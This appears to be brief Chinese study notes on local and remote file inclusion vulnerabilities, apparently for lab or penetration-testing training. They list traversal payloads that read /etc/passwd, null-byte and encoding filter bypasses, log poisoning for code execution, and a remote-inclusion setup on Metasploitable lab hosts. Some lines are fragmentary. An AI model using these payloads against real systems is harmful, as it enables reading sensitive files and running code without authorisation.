文件包含
本地文件包含
- 含有目录遍历和文件包含漏洞的特征:变量=页面;文件=值;
- 经典的测试方法:编码后也可以
../../../../../../../../etc/passwd
file:///etc/passwd
main.cgi
http://www.a.com/1.php
htp://1.1.1.1/../../../../../../dir/file.txt
- 编码绕过字符过滤
- 绕过文件扩展名过滤:“.”;"%00"
?file = a.doc%00.php==========file = a.doc- 编码绕过过滤: 用自动化工具转化
- 其他系统路径可能使用到的字符
- 例
- 代码执行
当用户有对log文件有读取和执行权限:可以先向log文件传入一条php代码,然后在url中用文件包含执行代码。
PS:前提:必须要有www-data对log文件的读取和执行权限。
远程文件包含
- metasploitable配置:
- 例(引用)
在192.168.181.132机器上包含192.168.181.128上的php代码。
- 字典: